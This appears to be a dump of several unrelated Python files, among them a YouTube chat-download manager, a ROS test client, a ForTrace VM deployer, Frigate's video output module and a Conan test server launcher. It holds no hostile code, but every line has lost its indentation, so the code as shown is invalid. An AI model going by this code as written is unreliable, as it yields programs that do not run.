except TransitionException:
if lives[vid].progress in {'unscraped', 'waiting', 'downloading'}:
print(f"warning: discarding weird progress status {lives[vid].progress}, setting to downloading:", vid)
lives[vid].reset_progress()
lives[vid].set_progress('waiting')
lives[vid].set_progress('downloading')
pids[vid] = (pid, dlpid)
persist_meta(lives[vid])
def invoke_downloader(video: Video):
try:
video_id = video.video_id
print('invoking for ' + str(video_id))
if pids.get(video_id):
print("warning: duplicate invocation for video " + video_id + " (according to internal PID state)", file=sys.stderr)
nowtime = dt.datetime.utcnow()
outfile = "_" + video_id + "_curr-" + str(nowtime.timestamp())
title = video.meta.get('title')
uploader = video.meta.get('uploader')
channel_id = video.meta.get('channel_id')
starttime = video.meta.get('live_starttime')
live_status = video.status
currtimesafe = safen_path(nowtime.isoformat(timespec='seconds')) + "_UTC"
with open("by-video-id/" + video_id + ".loginfo", "a") as fp:
res = {"video_id": video_id, "title": title, "channel_id": channel_id, "uploader": uploader, "starttime": starttime, "currtime": currtimesafe, "live_status": live_status, "basename": outfile}
fp.write(json.dumps(res, indent=2))
p = mp.Process(target=_invoke_downloader_start, args=(q, video_id, outfile))
p.start()
# Wait for the process to spawn and for the downloader PID to be sent.
time.sleep(0.5)
process_dlpid_queue() # hopefully just what we just spawned
except Exception:
print("warning: downloader invocation failed because of an exception. printing traceback...", file=sys.stderr)
traceback.print_exc()
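# check_pid() relies on os.kill(pid, 0): signal 0 sends nothing but still performs the
# existence/permission checks, raising OSError when the process cannot be signalled.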
def check_pid(pid):
""" Check For the existence of a unix pid. """
try:
os.kill(int(pid), 0)
except OSError:
return False
else:
return True
def start_watchdog():
""" Ensure the program exits after a top-level exception. """
subprocess.run('date')
subprocess.Popen([watchdogprog, str(os.getpid())])
def _invoke_downloader_start(q, video_id, outfile):
# There is not much use for the python pid, we store the process ID only for debugging
pid = os.getpid()
print("process fork " + str(pid) + " is live, with outfile " + outfile)
proc = subprocess.Popen([downloadchatprgm, outfile, video_id])
q.put((pid, proc.pid, video_id))
# Close the queue to flush it and avoid blocking the python process on exit.
time.sleep(0.1)
try:
q.close()
except AttributeError:
pass # older python versions (pre-3.9) lack close()
# Block this fork (hopefully not the main process)
try:
proc.wait()
print("process fork " + str(pid) + " has waited")
except KeyboardInterrupt:
print("process fork " + str(pid) + " was interrupted")
raise KeyboardInterrupt from None
def delete_ytmeta_raw(video: Video, suffix=None):
""" Delete ytmeta['raw'] field that eats memory; count deletions """
try:
video.rawmeta = None
keyname = 'ytmeta del successes'
if suffix:
keyname = keyname + suffix
general_stats[keyname] = general_stats.setdefault(keyname, 0) + 1
except (KeyError, AttributeError):
keyname = 'ytmeta del failures'
if suffix:
keyname = keyname + suffix
general_stats[keyname] = general_stats.setdefault(keyname, 0) + 1
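# process_one_status() drives the per-video lifecycle:
#   'waiting'      -> invoke the chat downloader
#   'downloading'  -> verify the downloader PID; if it died, re-check the stream and either
#                     reinvoke (still live/upcoming) or mark it 'downloaded'
#   'missed'/'invalid'/'aborted'/'downloaded' -> log once and drop the raw ytmeta to save memory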
def process_one_status(video: Video, first=False):
# Process only on change
if video.did_status_print:
return
video_id = video.video_id
if video.progress == 'waiting':
if video.meta is None:
print("error: video.meta missing for video " + video_id, file=sys.stderr)
# video.prepare_meta()
else:
print("status: just invoked: " + video_id, file=statuslog)
invoke_downloader(video)
elif video.progress == 'missed':
if first:
print("status: missed (possibly cached?): " + video_id, file=statuslog)
else:
print("status: missed: " + video_id, file=statuslog)
delete_ytmeta_raw(video)
elif video.progress == 'invalid':
if first:
print("status: upload (possibly cached/bogus?): " + video_id, file=statuslog)
else:
print("status: upload: " + video_id, file=statuslog)
delete_ytmeta_raw(video)
elif video.progress == 'aborted':
if first:
print("status: aborted (possibly cached/bogus?): " + video_id, file=statuslog)
else:
print("status: aborted: " + video_id, file=statuslog)
delete_ytmeta_raw(video)
elif video.progress == 'downloading':
if first:
print("status: downloading (but this is wrong; we just started!): " + video_id, file=statuslog)
wants_rescrape = False
if pids.get(video_id):
(pypid, dlpid) = pids[video_id]
if not check_pid(dlpid):
print("status: dlpid no longer exists: " + video_id, file=statuslog)
# Check before making this video unredownloadable
wants_rescrape = True
else:
if first:
print("status: downloading (apparently, may be bogus): " + video_id, file=statuslog)
else:
print("status: downloading: " + video_id, file=statuslog)
else:
if first:
print("warning: pid lookup for video " + video_id + " failed (initial load, should be unreachable).", file=sys.stderr)
else:
print("warning: pid lookup for video " + video_id + " failed.", file=sys.stderr)
print("status: unknown: " + video_id, file=statuslog)
wants_rescrape = True
if wants_rescrape:
# Check status
downloader = ChatDownloader()
youtube = downloader.create_session(YouTubeChatDownloader)
details = None
try:
details = youtube.get_video_data(video_id)
except Exception:
pass
if details and details.get('status') in {'live', 'upcoming'}:
print("warning: downloader seems to have exited prematurely. reinvoking:", video_id, file=sys.stderr)
invoke_downloader(video)
else:
video.set_progress('downloaded')
try:
del pids[video_id]
except KeyError:
pass
persist_meta(video, fresh=True)
delete_ytmeta_raw(video)
elif video.progress == 'downloaded':
if first:
print("status: finished (cached?): " + video_id, file=statuslog)
else:
print("status: finished: " + video_id, file=statuslog)
delete_ytmeta_raw(video)
if not video.did_meta_flush:
print("warning: didn't flush meta for video; flushing now", file=sys.stderr)
persist_meta(video, fresh=True)
video.did_progress_print = True
statuslog.flush()
def handle_special_signal(signum, frame):
os.makedirs('dump', exist_ok=True)
with open("dump/lives", "w") as fp:
for video in lives.values():
# Fine as long as no objects in the class.
fp.write(json.dumps(video.__dict__, sort_keys=True))
with open("dump/pids", "w") as fp:
fp.write(json.dumps(pids))
with open("dump/general_stats", "w") as fp:
fp.write(json.dumps(general_stats))
with open("dump/staticconfig", "w") as fp:
print("FORCE_RESCRAPE=" + str(FORCE_RESCRAPE), file=fp)
print("DISABLE_PERSISTENCE=" + str(DISABLE_PERSISTENCE), file=fp)
rescrape = rescrape_ytdlp
invoke_scraper = invoke_scraper_ytdlp
# TODO
if __name__ == '__main__':
mainpid = os.getpid()
write_cgroup(mainpid)
print(f"{mainpid = }")
# Prep storage and persistent state directories
os.makedirs('oo', exist_ok=True)
os.chdir('oo')
os.makedirs('by-video-id', exist_ok=True)
os.makedirs('chat-logs', exist_ok=True)
os.makedirs('pid', exist_ok=True)
signal.signal(signal.SIGUSR1, handle_special_signal)
print("Updating lives status", flush=True)
update_lives_status()
# Initial load
print("Starting initial pass", flush=True)
with open("discovery.txt", "a") as dlog:
print("program started", file=dlog, flush=True)
dlog.flush()
statuslog = open("status.txt", "a")
print("program started", file=statuslog)
statuslog.flush()
os.fsync(statuslog.fileno())
if True:
try:
# Populate cache from disk
for video_id, video in lives.items():
progress = video.progress
if progress == 'unscraped':
# Try to load missing meta from disk
recall_video(video_id)
# Try to make sure downloaders are tracked with correct state
process_dlpid_queue()
# Scrape each video again if needed
for video in lives.values():
maybe_rescrape_initially(video)
for video in lives.values():
process_one_status(video, first=True)
except KeyboardInterrupt:
statuslog.flush()
os.fsync(statuslog.fileno())
raise
except Exception as exc:
start_watchdog()
raise RuntimeError("Exception encountered during initial load processing") from exc
statuslog.flush()
print("Starting main loop", flush=True)
while True:
try:
time.sleep(SCRAPER_SLEEP_INTERVAL)
update_lives_status()
# Try to make sure downloaders are tracked with correct state
process_dlpid_queue()
# Scrape each video again if needed
for video in lives.values():
maybe_rescrape(video)
for video in lives.values():
process_one_status(video)
except KeyError:
print("warning: internal inconsistency! squashing KeyError exception...", file=sys.stderr)
except KeyboardInterrupt:
statuslog.flush()
raise
except Exception as exc:
start_watchdog()
raise RuntimeError("Exception encountered during main loop processing") from exc
finally:
print("number of active children: " + str(len(mp.active_children()))) # side effect: joins finished tasks
print("number of known lives: " + str(len(lives)))
counters = {'progress': {}, 'status': {}, 'meta': 0, 'rawmeta': 0}
for video in lives.values():
counters['status'][video.status] = counters['status'].setdefault(video.status, 0) + 1
counters['progress'][video.progress] = counters['progress'].setdefault(video.progress, 0) + 1
counters['meta'] += (video.meta is not None)
counters['rawmeta'] += (video.rawmeta is not None)
print("video states:")
for status, count in counters['status'].items():
print(f" number with video state {status}:", count)
print("progress states:")
for progress, count in counters['progress'].items():
print(f" number with progress state {progress}:", count)
print("number of meta objects:", counters['meta'])
print("number of rawmeta objects:", counters['rawmeta'])
print("number of tracked pid groups: " + str(len(pids)))
print(end='', flush=True)
statuslog.flush()
|
client_test.py
|
#!/usr/bin/env python
import sys
import time
import rospy
import threading
from pcu_common_utils.AcquireRessource import AcquireRessource
from pcu_sl_interface.srv import SetState
from pcu_sl_interface.msg import ControllerState, JointsVector
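# Test client flow (as implemented below): switch the controller to STANDBY, acquire the
# SL_RT_CORE resource, switch to TRA_VELOCITY, then publish ramping joint setpoints at 10 Hz
# until the resource is released or rospy shuts down.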
class Node:
def __init__(self):
self.sema = threading.Semaphore(0)
self.ar = AcquireRessource("/SL_RT_CORE/acquire")
self.srv_set_state = rospy.ServiceProxy("/SL_RT_CORE/set_state", SetState)
print("waiting for service...")
self.srv_set_state.wait_for_service()
print("ok!")
self.qd_pub = rospy.Publisher("/SL_RT_CORE/qd_set", JointsVector, queue_size=1)
def aq(self):
print("Aquiring Core")
if self.ar.acquire(1.0):
print("Aquired!")
else:
print("timeout!")
def run(self):
#self.done = false
self.setState(ControllerState.STANDBY)
self.aq()
self.setState(ControllerState.TRA_VELOCITY)
rate = rospy.Rate(10)
c = 0
#time.sleep(2)
while self.ar.is_acquired and not rospy.is_shutdown():
c += 0.1
jv = JointsVector()
jv.joint_data = [c, c*3.3]
self.qd_pub.publish(jv)
rate.sleep()
self.ar.release()
print("Broken")
def setState(self, nr):
cs = ControllerState()
cs.state = nr
if not self.srv_set_state(cs).success:
print("Failed to set State.")
else:
print("Setting state ok.")
rospy.init_node('client_test', anonymous=True)
node = Node()
t = threading.Thread(target=node.run)
t.start()
#node.run()
rospy.spin()
"""
id = generate_unique_id()
# Sends id to B using an action or a service
bond = bondpy.Bond("example_bond_topic", id)
bond.start()
if not bond.wait_until_formed(rospy.Duration(1.0)):
raise Exception('Bond could not be formed')
# ... do things with B ...
bond.wait_until_broken()
print "B has broken the bond"
"""
|
deployer.py
|
from __future__ import absolute_import
import subprocess
import inspect
import threading
from time import sleep
from fortrace.application.application import ApplicationVmmSide
from fortrace.application.application import ApplicationVmmSideCommands
from fortrace.application.application import ApplicationGuestSide
from fortrace.application.application import ApplicationGuestSideCommands
from fortrace.utility.line import lineno
###############################################################################
# Host side implementation
###############################################################################
class DeployerVmmSide(ApplicationVmmSide):
"""
This class is a remote control on the host-side to
install new programs and change their configuration.
"""
def __init__(self, guest_obj, args):
"""Set default attribute values only.
@param guest_obj: The guest on which this application is running. (will be inserted from guest::application())
@param args: containing
logger: Logger name for logging.
"""
try:
super(DeployerVmmSide, self).__init__(guest_obj, args)
self.logger.info("function: DeployerVmmSide::__init__")
except Exception as e:
raise Exception(lineno() + " Error: DeployerVmmSide::__init__ "
+ self.guest_obj.guestname + " " + str(e))
def deploy(self, iso_path):
"""Deploy a new program"""
try:
self.logger.info("DeployerVmmSide::deploy inserting CD image")
self.guest_obj.insertCD(iso_path)
# - wait a few seconds, giving the guest os enough time to mount the cd volume
sleep(5)
self.logger.info("function: DeployerVmmSide::deploy insertion done, execute deployment")
self.guest_obj.send("application " + "deployer " + " deploy ")
self.is_busy = True
except Exception as e:
raise Exception("error DeployerVmmSide::open: " + str(e))
def open(self):
"""
Abstract method, which all child classes have to overwrite.
"""
raise NotImplementedError
def close(self):
"""
Abstract method, which all child classes have to overwrite.
Close an instance of an application.
"""
raise NotImplementedError
###############################################################################
# Commands to parse on host side
###############################################################################
class DeployerVmmSideCommands(ApplicationVmmSideCommands):
"""
Class with all commands for <Deployer> which will be received from the agent on the guest.
Static only.
"""
@staticmethod
def commands(guest_obj, cmd):
# cmd[0] = win_id; cmd[1] = state
guest_obj.logger.info("function: DeployerVmmSideCommands::commands")
module_name = "deployer"
guest_obj.logger.debug("DeployerVmmSideCommands::commands: " + cmd)
try:
if "ready" == cmd:
guest_obj.logger.debug("in ready")
guest_obj.logger.info(module_name + " is_ready = true")
deployObj = guest_obj.applicationWindow[module_name][0]
deployObj.is_ready = True
deployObj.is_busy = False
if "error" == cmd:
guest_obj.logger.debug("in error")
guest_obj.logger.info(module_name + " has_error = True")
deployObj = guest_obj.applicationWindow[module_name][0]
deployObj.has_error = True
except Exception as e:
raise Exception(module_name + "_host_side_commands::commands " + str(e))
###############################################################################
# Guest side implementation
###############################################################################
class DeployerGuestSide(ApplicationGuestSide):
"""<Deployer> implementation of the guest side.
Usually Windows, Linux guest's
class attributes
window_id - The ID for the opened object
"""
def __init__(self, agent_obj, logger):
super(DeployerGuestSide, self).__init__(agent_obj, logger)
try:
self.module_name = "deployer"
self.agent_object = agent_obj
except Exception as e:
raise Exception("Error in " + self.__class__.__name__ +
": " + str(e))
def deploy(self, args):
"""
Starts the deployment process by executing setup.py from the CD drive.
return:
Send to the host in the known to be good state:
'application <Deployer> window_id open'.
'application <Deployer> window_id ready'.
in the error state:
'application <Deployer> window_id error'.
"""
try:
arguments = args.split(" ")
# installationPath = arguments[0]
self.logger.info("function: Deployer::open")
self.logger.debug("Deployment process starts now -> execute setup.py")
if self.agent_object.operatingSystem == "windows":
subprocess.call(['python', 'D:\\\\setup.py'])
elif self.agent_object.operatingSystem == "linux":
subprocess.call(['python', '/media/fortrace/CDROM/setup.py'])
else:
raise Exception(
lineno() + " Error: DeployerGuestSide::__deploy__ unkown operating system: " + self.agent_object.operatingSystem)
self.agent_object.send("application " + self.module_name + " ready")
except Exception as e:
self.agent_object.send("application " + self.module_name + " error")
self.logger.error("Deployer::open: " + str(e))
return
def open(self):
"""
Abstract method, which all child classes have to overwrite.
"""
raise NotImplementedError
def close(self):
"""
Abstract method, which all child classes have to overwrite.
"""
raise NotImplementedError
###############################################################################
# Commands to parse on guest side
###############################################################################
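# The dispatcher below resolves the method named in the command string via inspect.getmembers,
# runs it in a worker thread and waits up to 600 seconds; on timeout the object is flagged with
# has_error and an 'application <module> error' message is sent back to the host.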
class DeployerGuestSideCommands(ApplicationGuestSideCommands):
"""
Class with all commands for one application.
call the ask method for an object. The call will be done by a thread, so if the timeout is
reached, the open application will be closed and opened again.
Static only.
"""
@staticmethod
def commands(agent_obj, obj, cmd): # commands(obj, cmd) obj from list objlist[window_id] win id in cmd[1]?
try:
agent_obj.logger.info("static function DeployerGuestSideCommands::commands")
agent_obj.logger.debug("command to parse: " + cmd)
com = cmd.split(" ")
if len(com) > 3:
args = " ".join(com[3:])
module = com[0] # inspect.stack()[-1][1].split(".")[0]
window_id = com[1]
method_string = com[2]
method_found = False
methods = inspect.getmembers(obj, predicate=inspect.ismethod)
for method in methods:
# method[0] will now contain the name of the method
# method[1] will contain the value
if method[0] == method_string:
# start methods as threads
method_found = True
agent_obj.logger.debug("method to call: " + method[0] + "(" + args + ")")
agent_obj.logger.debug("args")
tmp_thread = threading.Thread(target=method[1], args=(args,))
agent_obj.logger.debug("thread is defined")
tmp_thread.start()
agent_obj.logger.debug("thread started")
tmp_thread.join(600) # Wait until the thread is completed
if tmp_thread.is_alive():
# process does not respond, kill it
agent_obj.logger.error("thread is alive... time outed")
agent_obj.logger.info("DeployerGuestSideCommands::commands: Close all open windows")
# TODO: kill setup.py
# set a crushed flag.
obj.is_opened = False
obj.is_busy = False
obj.has_error = True
agent_obj.logger.info("application " + module + " error")
agent_obj.send("application " + module + " error")
if not method_found:
raise Exception("Method " + method_string + " is not defined!")
except Exception as e:
raise Exception("Error in DeployerGuestSideCommands::commands " + str(e))
|
output.py
|
import datetime
import glob
import logging
import math
import multiprocessing as mp
import queue
import signal
import subprocess as sp
import threading
from multiprocessing import shared_memory
from wsgiref.simple_server import make_server
import cv2
import numpy as np
from setproctitle import setproctitle
from ws4py.server.wsgirefserver import (
WebSocketWSGIHandler,
WebSocketWSGIRequestHandler,
WSGIServer,
)
from ws4py.server.wsgiutils import WebSocketWSGIApplication
from ws4py.websocket import WebSocket
from frigate.config import BirdseyeModeEnum, FrigateConfig
from frigate.util import SharedMemoryFrameManager, copy_yuv_to_position, get_yuv_crop
logger = logging.getLogger(__name__)
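# FFMpegConverter pipes raw yuv420p frames into an ffmpeg subprocess and reads back an
# MPEG1-in-MPEG-TS stream scaled for the live view, which browser-side MPEG1 players
# (jsmpeg-style, presumably) consume over the websocket.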
class FFMpegConverter:
def __init__(self, in_width, in_height, out_width, out_height, quality):
ffmpeg_cmd = f"ffmpeg -f rawvideo -pix_fmt yuv420p -video_size {in_width}x{in_height} -i pipe: -f mpegts -s {out_width}x{out_height} -codec:v mpeg1video -q {quality} -bf 0 pipe:".split(
" "
)
self.process = sp.Popen(
ffmpeg_cmd,
stdout=sp.PIPE,
stderr=sp.DEVNULL,
stdin=sp.PIPE,
start_new_session=True,
)
def write(self, b):
self.process.stdin.write(b)
def read(self, length):
try:
return self.process.stdout.read1(length)
except ValueError:
return False
def exit(self):
self.process.terminate()
try:
self.process.communicate(timeout=30)
except sp.TimeoutExpired:
self.process.kill()
self.process.communicate()
class BroadcastThread(threading.Thread):
def __init__(self, camera, converter, websocket_server):
super(BroadcastThread, self).__init__()
self.camera = camera
self.converter = converter
self.websocket_server = websocket_server
def run(self):
while True:
buf = self.converter.read(65536)
if buf:
manager = self.websocket_server.manager
with manager.lock:
websockets = manager.websockets.copy()
ws_iter = iter(websockets.values())
for ws in ws_iter:
if (
not ws.terminated
and ws.environ["PATH_INFO"] == f"/{self.camera}"
):
try:
ws.send(buf, binary=True)
except:
pass
elif self.converter.process.poll() is not None:
break
class BirdsEyeFrameManager:
def __init__(self, config, frame_manager: SharedMemoryFrameManager):
self.config = config
self.mode = config.birdseye.mode
self.frame_manager = frame_manager
width = config.birdseye.width
height = config.birdseye.height
self.frame_shape = (height, width)
self.yuv_shape = (height * 3 // 2, width)
self.frame = np.ndarray(self.yuv_shape, dtype=np.uint8)
# initialize the frame as black and with the frigate logo
self.blank_frame = np.zeros(self.yuv_shape, np.uint8)
self.blank_frame[:] = 128
self.blank_frame[0 : self.frame_shape[0], 0 : self.frame_shape[1]] = 16
# find and copy the logo on the blank frame
logo_files = glob.glob("/opt/frigate/frigate/birdseye.png")
frigate_logo = None
if len(logo_files) > 0:
frigate_logo = cv2.imread(logo_files[0], cv2.IMREAD_UNCHANGED)
if frigate_logo is not None:
transparent_layer = frigate_logo[:, :, 3]
y_offset = height // 2 - transparent_layer.shape[0] // 2
x_offset = width // 2 - transparent_layer.shape[1] // 2
# shape[0] is the row (height) extent and shape[1] the column (width) extent
self.blank_frame[
y_offset : y_offset + transparent_layer.shape[0],
x_offset : x_offset + transparent_layer.shape[1],
] = transparent_layer
else:
logger.warning("Unable to read frigate logo")
self.frame[:] = self.blank_frame
self.cameras = {}
for camera, settings in self.config.cameras.items():
# precalculate the coordinates for all the channels
y, u1, u2, v1, v2 = get_yuv_crop(
settings.frame_shape_yuv,
(
0,
0,
settings.frame_shape[1],
settings.frame_shape[0],
),
)
self.cameras[camera] = {
"last_active_frame": 0.0,
"current_frame": 0.0,
"layout_frame": 0.0,
"channel_dims": {
"y": y,
"u1": u1,
"u2": u2,
"v1": v1,
"v2": v2,
},
}
self.camera_layout = []
self.active_cameras = set()
self.layout_dim = 0
self.last_output_time = 0.0
def clear_frame(self):
logger.debug(f"Clearing the birdseye frame")
self.frame[:] = self.blank_frame
def copy_to_position(self, position, camera=None, frame_time=None):
if camera is None:
frame = None
channel_dims = None
else:
try:
frame = self.frame_manager.get(
f"{camera}{frame_time}", self.config.cameras[camera].frame_shape_yuv
)
except FileNotFoundError:
# TODO: better frame management would prevent this edge case
logger.warning(
f"Unable to copy frame {camera}{frame_time} to birdseye."
)
return
channel_dims = self.cameras[camera]["channel_dims"]
copy_yuv_to_position(
self.frame,
self.layout_offsets[position],
self.layout_frame_shape,
frame,
channel_dims,
)
def camera_active(self, object_box_count, motion_box_count):
if self.mode == BirdseyeModeEnum.continuous:
return True
if (
self.mode == BirdseyeModeEnum.motion
and object_box_count + motion_box_count > 0
):
return True
if self.mode == BirdseyeModeEnum.objects and object_box_count > 0:
return True
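# update_frame() below recomputes the grid: cameras active within the last 30 seconds are placed
# on a ceil(sqrt(n)) x ceil(sqrt(n)) layout; removed cameras are replaced by newly active ones or
# blanked, and a position is redrawn only when that camera has a newer frame than the one shown.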
def update_frame(self):
# determine how many cameras are tracking objects within the last 30 seconds
active_cameras = set(
[
cam
for cam, cam_data in self.cameras.items()
if cam_data["last_active_frame"] > 0
and cam_data["current_frame"] - cam_data["last_active_frame"] < 30
]
)
# if there are no active cameras
if len(active_cameras) == 0:
# if the layout is already cleared
if len(self.camera_layout) == 0:
return False
# if the layout needs to be cleared
else:
self.camera_layout = []
self.layout_dim = 0
self.clear_frame()
return True
# calculate layout dimensions
layout_dim = math.ceil(math.sqrt(len(active_cameras)))
# reset the layout if it needs to be different
if layout_dim != self.layout_dim:
logger.debug(f"Changing layout size from {self.layout_dim} to {layout_dim}")
self.layout_dim = layout_dim
self.camera_layout = [None] * layout_dim * layout_dim
# calculate resolution of each position in the layout
self.layout_frame_shape = (
self.frame_shape[0] // layout_dim, # height
self.frame_shape[1] // layout_dim, # width
)
self.clear_frame()
for cam_data in self.cameras.values():
cam_data["layout_frame"] = 0.0
self.active_cameras = set()
self.layout_offsets = []
# calculate the x and y offset for each position in the layout
for position in range(0, len(self.camera_layout)):
y_offset = self.layout_frame_shape[0] * math.floor(
position / self.layout_dim
)
x_offset = self.layout_frame_shape[1] * (position % self.layout_dim)
self.layout_offsets.append((y_offset, x_offset))
removed_cameras = self.active_cameras.difference(active_cameras)
added_cameras = active_cameras.difference(self.active_cameras)
self.active_cameras = active_cameras
# update each position in the layout
for position, camera in enumerate(self.camera_layout, start=0):
# if this camera was removed, replace it or clear it
if camera in removed_cameras:
# if replacing this camera with a newly added one
if len(added_cameras) > 0:
added_camera = added_cameras.pop()
self.camera_layout[position] = added_camera
self.copy_to_position(
position,
added_camera,
self.cameras[added_camera]["current_frame"],
)
self.cameras[added_camera]["layout_frame"] = self.cameras[
added_camera
]["current_frame"]
# if removing this camera with no replacement
else:
self.camera_layout[position] = None
self.copy_to_position(position)
removed_cameras.remove(camera)
# if an empty spot and there are cameras to add
elif camera is None and len(added_cameras) > 0:
added_camera = added_cameras.pop()
self.camera_layout[position] = added_camera
self.copy_to_position(
position,
added_camera,
self.cameras[added_camera]["current_frame"],
)
self.cameras[added_camera]["layout_frame"] = self.cameras[added_camera][
"current_frame"
]
# if not an empty spot and the camera has a newer frame, copy it
elif (
camera is not None
and self.cameras[camera]["current_frame"]
!= self.cameras[camera]["layout_frame"]
):
self.copy_to_position(
position, camera, self.cameras[camera]["current_frame"]
)
self.cameras[camera]["layout_frame"] = self.cameras[camera][
"current_frame"
]
return True
def update(self, camera, object_count, motion_count, frame_time, frame) -> bool:
# update the last active frame for the camera
self.cameras[camera]["current_frame"] = frame_time
if self.camera_active(object_count, motion_count):
self.cameras[camera]["last_active_frame"] = frame_time
now = datetime.datetime.now().timestamp()
# limit output to 10 fps
if (now - self.last_output_time) < 1 / 10:
return False
# if the frame was updated or the fps is too low, send frame
if self.update_frame() or (now - self.last_output_time) > 1:
self.last_output_time = now
return True
return False
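# output_frames() is the process entry point: it starts a websocket server on 127.0.0.1:8082,
# creates one FFMpegConverter + BroadcastThread per camera (plus an optional birdseye pair), then
# pulls frames from video_output_queue and only feeds the encoders whose websocket path has a
# connected client.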
def output_frames(config: FrigateConfig, video_output_queue):
threading.current_thread().name = "output"
setproctitle("frigate.output")
stop_event = mp.Event()
def receiveSignal(signalNumber, frame):
stop_event.set()
signal.signal(signal.SIGTERM, receiveSignal)
signal.signal(signal.SIGINT, receiveSignal)
frame_manager = SharedMemoryFrameManager()
previous_frames = {}
# start a websocket server on 8082
WebSocketWSGIHandler.http_version = "1.1"
websocket_server = make_server(
"127.0.0.1",
8082,
server_class=WSGIServer,
handler_class=WebSocketWSGIRequestHandler,
app=WebSocketWSGIApplication(handler_cls=WebSocket),
)
websocket_server.initialize_websockets_manager()
websocket_thread = threading.Thread(target=websocket_server.serve_forever)
converters = {}
broadcasters = {}
for camera, cam_config in config.cameras.items():
width = int(
cam_config.live.height
* (cam_config.frame_shape[1] / cam_config.frame_shape[0])
)
converters[camera] = FFMpegConverter(
cam_config.frame_shape[1],
cam_config.frame_shape[0],
width,
cam_config.live.height,
cam_config.live.quality,
)
broadcasters[camera] = BroadcastThread(
camera, converters[camera], websocket_server
)
if config.birdseye.enabled:
converters["birdseye"] = FFMpegConverter(
config.birdseye.width,
config.birdseye.height,
config.birdseye.width,
config.birdseye.height,
config.birdseye.quality,
)
broadcasters["birdseye"] = BroadcastThread(
"birdseye", converters["birdseye"], websocket_server
)
websocket_thread.start()
for t in broadcasters.values():
t.start()
birdseye_manager = BirdsEyeFrameManager(config, frame_manager)
while not stop_event.is_set():
try:
(
camera,
frame_time,
current_tracked_objects,
motion_boxes,
regions,
) = video_output_queue.get(True, 10)
except queue.Empty:
continue
frame_id = f"{camera}{frame_time}"
frame = frame_manager.get(frame_id, config.cameras[camera].frame_shape_yuv)
# send camera frame to ffmpeg process if websockets are connected
if any(
ws.environ["PATH_INFO"].endswith(camera) for ws in websocket_server.manager
):
# write to the converter for the camera if clients are listening to the specific camera
converters[camera].write(frame.tobytes())
# update birdseye if websockets are connected
if config.birdseye.enabled and any(
ws.environ["PATH_INFO"].endswith("birdseye")
for ws in websocket_server.manager
):
if birdseye_manager.update(
camera,
len(current_tracked_objects),
len(motion_boxes),
frame_time,
frame,
):
converters["birdseye"].write(birdseye_manager.frame.tobytes())
if camera in previous_frames:
frame_manager.delete(f"{camera}{previous_frames[camera]}")
previous_frames[camera] = frame_time
while not video_output_queue.empty():
(
camera,
frame_time,
current_tracked_objects,
motion_boxes,
regions,
) = video_output_queue.get(True, 10)
frame_id = f"{camera}{frame_time}"
frame = frame_manager.get(frame_id, config.cameras[camera].frame_shape_yuv)
frame_manager.delete(frame_id)
for c in converters.values():
c.exit()
for b in broadcasters.values():
b.join()
websocket_server.manager.close_all()
websocket_server.manager.stop()
websocket_server.manager.join()
websocket_server.shutdown()
websocket_thread.join()
logger.info("exiting output process...")
|
server_launcher.py
|
#!/usr/bin/python
import os
import shutil
import time
from conans import SERVER_CAPABILITIES
from conans.paths import SimplePaths
from conans.server.conf import get_server_store
from conans.server.crypto.jwt.jwt_credentials_manager import JWTCredentialsManager
from conans.server.crypto.jwt.jwt_updown_manager import JWTUpDownAuthManager
from conans.server.migrate import migrate_and_get_server_config
from conans.server.rest.server import ConanServer
from conans.server.service.authorize import BasicAuthenticator, BasicAuthorizer
from conans.test.utils.test_files import temp_folder
from conans.util.files import mkdir
from conans.util.log import logger
TESTING_REMOTE_PRIVATE_USER = "private_user"
TESTING_REMOTE_PRIVATE_PASS = "private_pass"
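# TestServerLauncher wires up a disposable conan_server: a temp storage folder, JWT credential and
# up/down managers, permissive read permissions plus a private test user, and a ConanServer bound
# to the port taken from the migrated server config.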
class TestServerLauncher(object):
port = 0
def __init__(self, base_path=None, read_permissions=None,
write_permissions=None, users=None, base_url=None, plugins=None,
server_version=None,
min_client_compatible_version=None,
server_capabilities=None):
plugins = plugins or []
if not base_path:
base_path = temp_folder()
if not os.path.exists(base_path):
raise Exception("Base path not exist! %s")
# Define storage_folder, if not, it will be read from conf file and
# pointed to real user home
self.storage_folder = os.path.join(base_path, ".conan_server", "data")
mkdir(self.storage_folder)
server_config = migrate_and_get_server_config(base_path, self.storage_folder)
if server_capabilities is None:
server_capabilities = set(SERVER_CAPABILITIES)
if TestServerLauncher.port == 0:
TestServerLauncher.port = server_config.port
# Encode and Decode signature for Upload and Download service
updown_auth_manager = JWTUpDownAuthManager(server_config.updown_secret,
server_config.authorize_timeout)
base_url = base_url or server_config.public_url
self.server_store = get_server_store(server_config.disk_storage_path,
base_url, updown_auth_manager)
# Prepare some test users
if not read_permissions:
read_permissions = server_config.read_permissions
read_permissions.append(("private_library/1.0.0@private_user/testing", "*"))
read_permissions.append(("*/*@*/*", "*"))
if not write_permissions:
write_permissions = server_config.write_permissions
if not users:
users = dict(server_config.users)
users[TESTING_REMOTE_PRIVATE_USER] = TESTING_REMOTE_PRIVATE_PASS
authorizer = BasicAuthorizer(read_permissions, write_permissions)
authenticator = BasicAuthenticator(users)
credentials_manager = JWTCredentialsManager(server_config.jwt_secret,
server_config.jwt_expire_time)
logger.debug("Storage path: %s" % self.storage_folder)
self.port = TestServerLauncher.port
self.paths = SimplePaths(server_config.disk_storage_path)
self.ra = ConanServer(self.port, credentials_manager, updown_auth_manager,
authorizer, authenticator, self.server_store,
server_version, min_client_compatible_version,
server_capabilities)
for plugin in plugins:
self.ra.api_v1.install(plugin)
self.ra.api_v2.install(plugin)
def start(self, daemon=True):
"""from multiprocessing import Process
self.p1 = Process(target=ra.run, kwargs={"host": "0.0.0.0"})
self.p1.start()
self.p1"""
import threading
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self, *args, **kwargs):
super(StoppableThread, self).__init__(*args, **kwargs)
# Use a distinct name: threading.Thread defines an internal _stop member in Python 3
self._stop_event = threading.Event()
def stop(self):
self._stop_event.set()
def stopped(self):
return self._stop_event.is_set()
self.t1 = StoppableThread(target=self.ra.run, kwargs={"host": "0.0.0.0", "quiet": True})
self.t1.daemon = daemon
self.t1.start()
time.sleep(1)
def stop(self):
self.ra.root_app.close()
self.t1.stop()
def clean(self):
if os.path.exists(self.storage_folder):
try:
shutil.rmtree(self.storage_folder)
except:
print("Can't clean the test server data, probably a server process is still opened")
if __name__ == "__main__":
server = TestServerLauncher()
server.start(daemon=False)
|
test_logging.py
|
# Copyright 2001-2017 by Vinay Sajip. All Rights Reserved.
#
